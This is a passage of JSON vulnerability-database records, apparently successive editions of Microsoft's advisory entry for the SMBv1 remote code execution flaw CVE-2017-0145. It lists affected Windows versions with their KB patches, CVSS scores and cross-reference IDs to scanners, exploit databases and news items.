"kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4014077", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4014077", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 